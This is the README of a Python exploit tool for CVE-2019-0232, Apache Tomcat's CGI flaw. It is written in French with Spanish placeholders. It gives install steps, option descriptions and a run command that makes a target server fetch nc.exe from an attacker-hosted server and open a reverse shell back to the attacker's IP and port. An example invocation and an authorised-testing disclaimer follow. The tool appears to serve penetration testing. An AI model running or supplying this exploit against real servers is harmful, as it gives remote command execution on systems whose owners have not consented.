
Exploit Python pour CVE-2019-0232 ciblant les vulnérabilités CGI d'Apache Tomcat avec connexion reverse shell automatisée et paramètres de cible/attaquant personnalisables.
Un script Python conçu pour exploiter les vulnérabilités CGI sur les serveurs Apache Tomcat en exécutant une connexion de shell inversé.

requestsgit clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target : Adresse IP de la cible avec Apache Tomcat-i, --ip : Adresse IP de l'attaquant hébergeant nc.exe-ncp, --nc-port : Port pour la connexion de shell inversé-p, --port : Port de la cible (par défaut : 8080)-sp, --server-port : Port du serveur pour héberger nc.exe (par défaut : 80)-cgi, --cgi-script : Nom du script CGI à exploiter (par défaut : cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Cet outil est fourni uniquement à des fins éducatives et pour des tests de pénétration autorisés. L'auteur et les contributeurs ne sont pas responsables de toute mauvaise utilisation ou des dommages causés par ce script. Obtenez toujours une autorisation appropriée avant de tester un système.